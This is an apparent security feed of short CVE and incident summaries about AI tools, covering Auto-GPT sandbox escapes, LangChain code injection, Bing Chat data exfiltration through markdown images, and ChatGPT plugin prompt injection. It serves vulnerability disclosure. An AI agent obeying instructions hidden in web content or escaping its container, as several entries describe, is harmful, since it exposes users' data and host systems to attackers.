All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Auto-GPT versions before 0.4.3 have a path traversal vulnerability (a weakness where an attacker uses file paths like '../../../' to access files outside the intended directory) in the `execute_python_code` command that fails to validate filenames, allowing an attacker to write malicious code outside the sandbox and execute arbitrary commands on the host system. This vulnerability bypasses the Docker container (a tool that isolates applications) meant to protect the main system from untrusted code.
Fix: The issue has been patched in version 0.4.3. As a workaround, run Auto-GPT in a virtual machine or another environment in which damage to files or corruption of the program is not a critical problem.
NVD/CVE DatabaseAuto-GPT versions before 0.4.3 have a security flaw where the docker-compose.yml file (a configuration file that sets up Docker containers) is mounted into the container without write protection. If an attacker tricks Auto-GPT into running malicious code through the `execute_python_file` or `execute_python_code` commands, they can overwrite this file and gain control of the host system (the main computer running Auto-GPT) when it restarts.
OpenAI removed the 'Chat with Code' plugin from its store after security researchers discovered it was vulnerable to CSRF (cross-site request forgery, where an attacker tricks a system into making unwanted actions on behalf of a user). The vulnerability allowed ChatGPT to accidentally create GitHub issues without user permission when certain plugins were enabled together.
A SQL injection vulnerability (a type of attack where an attacker inserts malicious SQL commands into input fields) exists in langchain versions before v0.0.247 in the SQLDatabaseChain component, allowing remote attackers to obtain sensitive information from databases.
CVE-2023-36188 is a vulnerability in langchain version 0.0.64 that allows a remote attacker to execute arbitrary code (running commands they shouldn't be able to run) through the PALChain parameter in Python's exec method. This is a type of injection attack (CWE-74, where an attacker tricks a system by inserting malicious code into input that gets processed as commands).
CVE-2023-36258 is a vulnerability in LangChain before version 0.0.236 that allows an attacker to execute arbitrary code (run any commands they want on a system) by exploiting the ability to use Python functions like os.system, exec, or eval (functions that can run code dynamically). This is a code injection vulnerability (CWE-94, where attackers trick a program into running unintended code).
Langchain version 0.0.171 has a vulnerability that allows arbitrary code execution (running uncontrolled commands on a system) through its load_prompt function. The vulnerability was reported in June 2023, but the provided source material does not contain detailed information about how the vulnerability works or its severity rating.
Bing Chat contained a prompt injection vulnerability (tricking an AI by hiding instructions in its input) where malicious text on websites could trick the AI into returning markdown image tags that send sensitive data to an attacker's server. When Bing Chat's client converts markdown to HTML, an attacker can embed data in the image URL, exfiltrating (stealing and sending out) information without the user knowing.
Langchain versions before v0.0.225 contained a remote code execution (RCE, where attackers can run commands on a system they don't own) vulnerability in the JiraAPIWrapper component that allowed attackers to execute arbitrary code through specially crafted input. The vulnerability was identified in the JiraAPI wrapper component of the library.
Gradio, an open-source Python library for building machine learning and data science applications, has a vulnerability where it fails to properly filter file paths and restrict which URLs can be proxied (accessed through Gradio as an intermediary), allowing unauthorized file access. This vulnerability affects input validation (the process of checking that data entering a system is safe and expected).
ChuanhuChatGPT (a graphical interface for ChatGPT and other large language models) has a vulnerability in versions 20230526 and earlier that allows attackers to access the config.json file (a configuration file storing sensitive settings) without permission when authentication is disabled, potentially exposing API keys (credentials that grant access to external services). The vulnerability allows attackers to steal these API keys from the configuration file.
gpt_academic (a tool that provides a graphical interface for ChatGPT/GLM) versions 3.37 and earlier have a vulnerability where the Configuration File Handler allows attackers to read sensitive files through the `/file` route because no files are protected from access. This can leak sensitive information from working directories to users who shouldn't have access to it.
Autolab, a service that automatically grades programming assignments in courses, has a tar slip vulnerability (a flaw where extracted files can be placed outside their intended directory) in its assessment installation feature. An attacker with instructor permissions could upload a specially crafted tar file (a compressed archive format) with file paths like `../../../../tmp/tarslipped1.sh` to place files anywhere on the system when the form is submitted.
Autolab, a service that manages programming courses and automatically grades assignments, has a tar slip vulnerability (a flaw where compressed files can extract to unintended locations outside their target directories) in its MOSS cheat checker feature. An authenticated instructor could upload a specially crafted tar file (compressed archive) that extracts files to arbitrary locations on the system, potentially allowing them to write malicious files anywhere the service has access.
CVE-2023-28382 is a directory traversal vulnerability (a flaw that lets attackers access files outside intended directories) in ESS REC Agent Server Edition across multiple operating systems. An authenticated attacker (someone with valid login credentials) can use this vulnerability to view or modify any file on the affected server. The vulnerability affects versions 1.0.0 to 1.4.3 on Linux, 1.1.0 to 1.4.0 on Solaris and HP-UX, and 1.2.0 to 1.4.1 on AIX.
CVE-2023-2800 is a vulnerability in the Hugging Face Transformers library (a popular tool for working with AI language models) prior to version 4.30.0 that involves insecure temporary files (CWE-377, a weakness where temporary files are created in ways that attackers could exploit). The vulnerability was discovered and reported through the huntr.dev bug bounty platform.
Fix: Update to Auto-GPT version 0.4.3 or later, as the issue has been patched in that version.
NVD/CVE DatabaseGoogle Docs recently added new AI features, such as automatic summaries and creative content generation, which are helpful but introduce security risks. The main concern is that using these AI features on untrusted data (information you don't know the source or reliability of) could lead to unwanted consequences, though currently attackers have limited ways to exploit these features.
Fix: Update langchain to version v0.0.247 or later.
NVD/CVE DatabaseFix: A patch is available at https://github.com/hwchase17/langchain/pull/6003
NVD/CVE DatabaseFix: Upgrade LangChain to version 0.0.236 or later.
NVD/CVE DatabaseOpenAI's plugin store contains security vulnerabilities, particularly in plugins that can act on behalf of users without adequate security review. These plugins are susceptible to prompt injection attacks (tricking an AI by hiding instructions in its input) and the Confused Deputy Problem (where an attacker can manipulate a plugin into performing harmful actions by exploiting its trust in the AI system), allowing adversaries to steal source code or cause other damage.
Fix: Update Langchain to v0.0.225 or later. A fix is available in the release v0.0.225.
NVD/CVE DatabaseA security researcher created a demonstration website that shows how indirect prompt injection (tricking an AI by hiding instructions in web content it reads) can be used to hijack ChatGPT when the browsing feature is enabled. The demo lets users explore various AI-based attacks, including data theft and manipulation of ChatGPT's responses, to raise awareness of these vulnerabilities.
Fix: Users are advised to upgrade to version 3.34.0. The source notes there are no known workarounds for this vulnerability.
NVD/CVE DatabaseFix: The vulnerability has been fixed in commit bfac445. As a workaround, setting up access authentication (a login system that restricts who can access the software) can help mitigate the vulnerability.
NVD/CVE DatabaseFix: A patch is available at commit 1dcc2873d2168ad2d3d70afcb453ac1695fbdf02. As a workaround, users can configure the project using environment variables instead of `config*.py` files, or use docker-compose installation (a tool for running containerized applications) to configure the project instead of configuration files.
NVD/CVE DatabaseChatGPT plugins can be exploited through indirect prompt injections (attacks that hide malicious instructions in data the AI reads from external sources rather than directly from the user), which hackers have used to access private data through cross-plugin request forgery (a vulnerability where one plugin tricks another into performing unauthorized actions). The post documents a real exploit found in the wild and explains the security fix that was applied.
Fix: Upgrade to version 2.11.0 or later.
NVD/CVE DatabaseFix: This issue has been addressed in version 2.11.0. Users are advised to upgrade.
NVD/CVE DatabaseFix: Update to version 4.30.0 or later. A patch is available at https://github.com/huggingface/transformers/commit/80ca92470938bbcc348e2d9cf4734c7c25cb1c43.
NVD/CVE Database